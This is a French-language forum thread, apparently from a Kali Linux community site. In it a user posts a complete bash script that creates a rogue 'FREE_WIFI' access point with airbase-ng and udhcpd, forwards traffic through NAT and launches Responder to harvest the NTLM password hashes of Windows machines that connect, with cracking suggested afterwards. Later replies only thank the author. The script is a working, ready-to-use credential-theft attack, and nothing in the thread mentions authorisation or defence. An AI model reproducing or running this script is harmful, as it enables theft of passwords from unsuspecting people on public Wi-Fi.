Auteur Sujet: Rogue AP + NTML  (Lu 2343 fois)

0 Membres et 2 Invités sur ce sujet

Hors ligne _john_doe

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 544
  • Notoriété : +27/-5
Rogue AP + NTML
« le: 04 novembre 2017 à 16:07:54 »
Bonjour,
Pour faire suite à un precedent sujet qui traitait des faiblesses NTLM, me suis amusé à un petit script qui automatise les choses suivantes :
- Creation d'un rogue AP (FREE_WIFI)
- lancement de responder sur cette rogue pour capture hash windows de toutes les machines s'y connectant.
L'objectif : recuperer tous les hash Windows des machines qui se connecteront sur votre rogue AP
C'est un bash basique mais je me fais la main.
Pour le lancer vous aurez besoin de :
-Responder (cf precedent post)
- udhcpd (qui servira de serveur DHCP pour attribuer les adresses et gerer le DNS). Vous pouvez bien entendu utiliser autre autre serveur DHCP, il faudra changer le script en consequence

A noter dans le script :
Les interfaces sont référencées par les variables BOX_IFACE (l'interface qui vous sert à votre connection internet), ROGUE_IFACE (l'interface qui servira de rogue AP).
A modifier selon vos propres interfaces. Dans ce script nous avons eth0->connection Box et Wlan0 ->wlan0mon - >at0 -> rogue AP.
Le sous reseau cree est en 192.168.2/24 . La passerelle etant 192.168.2.1.
Les DNS utilisés sont ceux de Google. Rien n'empeche le spoofing DNS
Il ne vous reste plus ensuite qu'a passer vos hash capturés dans un outil quelqconque.
Ne pas oublier le chmod +x pour pouvoir lancer le bash

#!/bin/bash
# Creation rogue wifi et capture MDP windows via NTLM
 
# interfaces reseaux utilisées
BOX_IFACE=eth0
ROGUE_IFACE=wlan0

# Emplacement fichier de logs

LOG_FILE=/tmp/log.txt
 
# un peu de menage d'abord
rm /tmp/udhcpd.* &> /dev/null
rm $LOG_FILE &> /dev/null
killall airbase-ng &> /dev/null
killall udhcpd &> /dev/null
airmon-ng stop wlan0mon &> /dev/null
 
# Configuration DHCP

echo "max_leases 10
start 192.168.2.10
end 192.168.2.20
interface at0
domain local
option dns 8.8.8.8
option subnet 255.255.255.0
option router 192.168.2.1
lease 7200
lease_file /tmp/udhcpd.leases" > /tmp/udhcpd.conf
touch /tmp/udhcpd.leases &>> $LOG_FILE
 
#Création du réseau WiFi
echo "Démarage du réseau WiFi"
airmon-ng start $ROGUE_IFACE &>> $LOG_FILE
airbase-ng -c 3 -e 'FREE_WIFI' wlan0mon &>> $LOG_FILE &
sleep 5
ifconfig at0 up
ifconfig at0 192.168.2.1 netmask 255.255.255.0 &>> $LOG_FILE
# Démarrage du DHCP et ip forwarding
echo "Démarrage du serveur DHCP"
udhcpd /tmp/udhcpd.conf &>> $LOG_FILE
echo 1 > /proc/sys/net/ipv4/ip_forward
# RAZ regles IPTABLES
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
# Activation transfert
iptables -t nat -A POSTROUTING -o $BOX_IFACE -j MASQUERADE
echo "Le réseau est ok"
echo "connectez vous sur ce reseau depuis un poste Windows apres démarrage ecoute NTLM"
echo "Demarrage capture NTLM"
echo "faites ctrl+Q quand le hash est capturé"
read -p "Appuyer sur une touche pour démarrer ..."
cd /usr/share/responder
responder -I at0 -wF

exit 0


Hors ligne Amelia28

  • Nouvel inscrit
  • Messages: 2
  • Notoriété : +0/-0
Re : Rogue AP + NTML
« Réponse #1 le: 30 juin 2019 à 23:22:47 »
Bonjour,
Je trouve ça très intéressant.
« Modifié: 22 août 2019 à 06:25:02 par Snk »

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre VIP
  • *****
  • Messages: 1419
  • Notoriété : +50/-2
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Rogue AP + NTML
« Réponse #2 le: 30 juin 2019 à 23:52:35 »
Merci pour le script :) ça permet d'automatisé le process :P
Mess  with the bests.
Die like the rest.

Hors ligne webmaster

  • Administrateur
  • Membre régulier
  • *****
  • Messages: 101
  • Notoriété : +7/-0
Re : Rogue AP + NTML
« Réponse #3 le: 01 juillet 2019 à 10:29:52 »
Merci pour cette contribution. Avec ça y a plus besoin de faire grand chose.... j'aime beaucoup.

Hors ligne Snk

  • Modérateur
  • Membre VIP
  • *****
  • Messages: 935
  • Notoriété : +53/-0
  • Multiboot Linux - Kali en Amateur - python(A)
Re : Rogue AP + NTML
« Réponse #4 le: 01 juillet 2019 à 11:44:32 »
Salut   :)

Merci pour ce travail! Good.   :P
Dés que je remonte mes tours, je testerais ça!
On ne gagne pas sa Liberté , elle se prend.
Membre du P.L.F, Bill Gate$ suck'$
Anti GAFAM - Brûlons les tous!